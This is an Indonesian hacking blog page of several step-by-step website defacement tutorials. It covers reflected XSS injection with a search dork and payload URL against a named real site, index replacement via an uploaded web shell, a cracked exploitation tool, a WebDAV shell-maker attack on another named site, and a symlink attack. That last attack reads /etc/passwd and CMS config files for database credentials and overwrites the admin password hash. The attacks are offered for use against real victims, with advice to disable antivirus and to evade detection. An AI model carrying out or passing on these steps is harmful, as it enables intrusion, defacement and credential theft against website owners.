Rabu, 11 September 2013

Cara Deface Website Menggunakan Teknik XSS Vulnerability

Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yaitu Cara Deface Website Menggunakan Teknik XSS Vulnerability.

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :



inurl:"/showcatrows.php?CategoryID="

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by New Team Cyber</h1></marquee>

4). Kemudian tekan Enter.

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html
5). Selesai, Website sudah berhasil kita deface :D
Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.
Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.


Cara Tebas Index Website CMS Wordpress


Assalamualaikum,,,
Hadewh,, demi sobat-sobat NT Cyber ane buatin nih Tutorial sederhana, biar pada ngerti,, wkwk :p
Langsung sajalah... Repot banget dah gitu males ngetik.. wkwkwk :p
Mohon Tutorial ini dibaca, diliat, dipahami dan dicermati baik2 yaahh,, ga ngerti ane jitaakk!! :3
ini untuk CMS Wordpress yah trus ane jg pake madspotshell,, jadi klo sobat pake shell yg lain pasti beda atuh :3

Notice! 
Kalo bisa index jangan dirusak! budayakan menghargai hasil kerja keras orang lain!

Dowload Madspotshell

Udah ah, langsung Buka Shellnya yah.. ;)


Saatnya nyari index nya,, dimana??? Dimana Dimana Dimana?? Hajiaahh! Malah nyanyi? -_- hehehe, santai ya sob, ;) Lihat Gambar! untuk mencari index nya sobat cuma perlu mencarinya di Path/folder utama website tsb. biasanya di Public_Html, klo ga ada, pokoknya dalemnya berisi file2 utama seperti: Wp-Login,Wp-Admin,Wp-Config, wp-content, dsb



Liat baik2 gambar diatas! di path utama berisikan semua files website! noh liat ada index.php, udah ketemu kan? kalo mau nyari config, klik aja wp-config.php :p
Ane harap, indexnya jangan dirusak, sebaiknya dibackup,, cukup upload aja file index.html  halaman deface sobat! atau  bisa juga index.php kita ubah. klik "R" di bagian kanan kemudian sobat rename aja jadi index.php_backup lalu klik [>>] untuk save!


Keterangan:

R : Rename
E : Edit
D : Download
X : Delete
[>>] : Eksekusi

selanjutnya buatlah file index.php yg baru lalu pastekan script deface sobat, dan save! liat gambar!



kalo sudah, langsung cek aja hasilnya,, :p hmm,, udah ah begitu aje kagak pelu repot2 :p

Web Application Exploiter (WappEx) Full Crack | New Team Cyber



Assalamualaikum....
Halo sobat,, sekarang cuma mau berbagi Tools aja, kalo lagi males biasanya ane pake ini saat melakukan exploitasi, maklum ane cuma Blogger Newbie, kalo yg master Hacker mah biasanya Manual :3
WAppEx ( Web Application Exploiter ) buatan om R3dm0ve ( Persian hacker ) sebuah tool's yg cukup lengkap didalamanya ada  beberapa tools gabungan untuk melakukan pentest sebuah website.
Feature:
  • SQL Injection
  • OS Command Execution
  • Script Injection
  • Local File Inclusion
  • Remote File Inclusion
  • Local File Disclourse



Cara Install:
 Install dulu sampe selesai, lalu copy dan pastekan file crack di C:\Programfiles\WappEx 

Content Creator : Onix AQua 
Sumber : http://indocyberarmy.blogspot.com/2013/03/web-application-exploiter-wappex-full.html 

Cara deface web dengan webdav buatan Hmei7 dan Lengkap step by step | New Team Cyber

Assalamualaikum Wr.Wb

Sesuai dengan judul posting kali ini , saya akan memberikan tutorial deface website menggunakan Webdav buatan Hmei7 . Sebenarnya tutorial ini sudah banyak sekali di mbah google , namun karena saya hanya ingin berbagi kepada yang belum bisa alangkah baiknya saya menuliskan tutorial ini . Langsung saja kita ke tutorial deface website menggunakan software Webdav .

Pertama , kalian harus download dulu software webdavnya di link dibawah ini :

Download Webdav via Mediafire ( 80 KB )

Setelah selesai download kalian matikan dulu anti virus di komputer / laptop anda ( supaya software bisa dibuka ) selanjutnya tinggal kalian buka filenya .

Kalau sudah dibuka tinggal klik tulisan " Webdav " lalu klik " Asp shell maker "


Setelah klik " Asp shell maker " anda akan melihat Program Webdav Shell Maker , jika sudah ada program Webdav Shell Maker anda klik tulisan " Setting ( untuk mengedit file / shell anda ) "
Setelah klik tulisan "Setting" edit tulisan /Hmei7.asp;.txt dengan tulisan anda contohnya ( /bLacK_.asp;.txt
 
sebenarnya tidak usah diedit juga tidak masalah ) setelah kalian edit tulisannya tinggal masukan target web / site korban . Caranya tinggal klik " Add Site " lalu masukan site korban ( contoh : http://www.odelagrange.com/ ) Jika sudah dimasukan web korban tinggal klik "Serang" ( tunggu sampai ada notice )
 checking : http://odelagrange.com
    shell created !!
    http://odelagrange.com/bLacK_.asp;.txt
Jika sudah muncul tulisannya tinggal copy hasil defacenya ( contoh : http://odelagrange.com/bLacK_.asp;.txt ) lanjut ke step berikutnya . Jika sudah dicopy tinggal paste di address bar anda ( Mozila , Google Chrome , IE , Opera Mini , dll ) lalu tekan enter .
Lalu setelah itu anda akan dialihkan ke situs http://odelagrange.com/bLacK_.asp;.txt dan saatnya anda untuk beraksi . Anda cari tulisan ( index.asp / index.html / index.htm / index.php / yang berhubungan dengan index gunakan ctrl+f supaya lebih mudah mencari ) pada contoh web http://odelagrange.com/bLacK_.asp;.txt ada tulisan " index.html " . 
Selanjutnya anda tinggal mengedit (klik gambar tanda seru untuk mengedit , jangan klik selain gambar itu ) data yang ada didalam file " index.html " dengan file / script deface anda ( jika belum punya silahkan 
download disini ) lalu klik " Kaydet / Save " . 
Jika data berhasil diedit maka ada tulisan " File Edited Successful:) " . 
Selamat anda telah berhasil mendeface website http://odelagrange.com Jika sudah success tinggal anda edit link / site target ( contoh : http://odelagrange.com/index.html biasanya jika /index.html dll bisa kena index dari web tersebut ) kemudian tekan enter di address bar anda . Jika halaman dari http://odelagrange.com/index.html berhasil maka akan ada script anda di web itu .
Jika anda ingin mencoba mengetahui apakah anda berhasil mendeface INDEX dari web tersebut caranya tinggal hapus saja tulisan /index.html (  contoh http://odelagrange.com/index.html ->
http://odelagrange.com/ )
NB : Jika masih belum mengerti bisa tuliskan yang belm dimengerti di kolom komentar .
Jika anda berhasil jangan lupa simpan nama bLacK_peArL di hasil deface / script anda , Terima Kasih .
" Tutorial di blog ini hanya sebagai pembelajaran , jadi jangan disalahgunakan "
Author : bLacK_peArL


Cara Hacker Hack Sebuah Web

Bahan & Alat :
1) Target Website
2) Shell
3) script symlink
4) MySQL manager
Langkah 1
Sekarang, kita periksa situsnya apa ada yg vuln utk dihajar :v
Ada satu hal yang tersisa, kita dapat hack situs tsb pada server yang sama ( 1 server ) #aneh yoo? maksute opo ? tapi tungguen baca dulu sampe rampungg...

Jadi kita udah punya target toh, langkah selanjutnya, kita harus cari tau IP servernya target

Yuk pergi ke CMD ( Start->RUN->CMD )
Code:
ping www.target.com





Sekarang kita dah memiliki(mengetahui) IP Server nya, skrg waktunya untuk cari celah ( vuln ) nya.

Pergi ke SINI dan masukan kode dibawah ini :
Code:
IP:IPYANGUDAHKITADAPETDARIPINGTADI ".php?*="



Selanjutnya,dari hasil scan IP tadi cari sebuah situs yang rentan terhadap SQLi. (Bisa di inject menggunakan tools seperti havij dll)

Kalo sukses, segera tanem shell

Langkah II
Hal pertama yang perlu dilakukan adalah menemukan path lengkap dari situs tsb.
yakni seperti begino:
Code:
/home/username/public_html/

Sekarang pergi ke shell dan jalankan perintah ini:
Code:
cat /etc/passwd


Sekarang copy semua teks yg tertera di situh dan tempel ke notepad.
Itu file berisi semua pengguna yg menggunakan server yg jadi target muw


Langkah III
Target ku adalah Joomla dan aq tau di mana file yg berisi informasi MySQL. (config.php)
Code:
/home/targetsaya/public_html/configuration.php ( Ini config nya joomla )

kalau wordpress mas ?
Kalo targetmu wordpress , config nya ada disini
Code:
/home/targetmu/public_html/wp-config.php

Nah, skrg upload symlink mu dan mySQL Manager nya ,
Buka symlink nya dan masukin path config web targetmu
dalam kasus ku iku :
Code:
/home/softcube/public_html/configuration.php
Sekarang klik "Symlink" dan skrg kita dapet mysql info nya


Salin semua ke Notepad + +
( Notepad++ lebih baik karena kita dapat dgn mudah menemukan password dan username)
Cari username dan password web targetmu yg da tercantum di mysql info nya,,dan buka mysql.php ,
Masukkan dan sekarang kita dpat mengedit database.









Sekarang klik "Tabel" dan klik table "admin".
disini kita bisa membuat user, staff, dan membuat pssword
(Ingatlah untuk mencatat hash asli sehingga cara hackmu tetep gak terdeteksi jika ingin akses lgi

Sekarang, aq sudah mengganti hash(password admin) dan login





Itu saja untuk saat ini.

Total Tayangan Halaman